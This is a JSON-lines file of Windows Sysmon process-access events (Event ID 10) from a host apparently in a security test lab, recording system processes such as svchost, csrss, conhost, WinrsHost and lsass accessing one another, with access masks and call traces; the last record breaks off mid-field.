{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.583\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.583","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.598\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1672\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.598","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1672","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 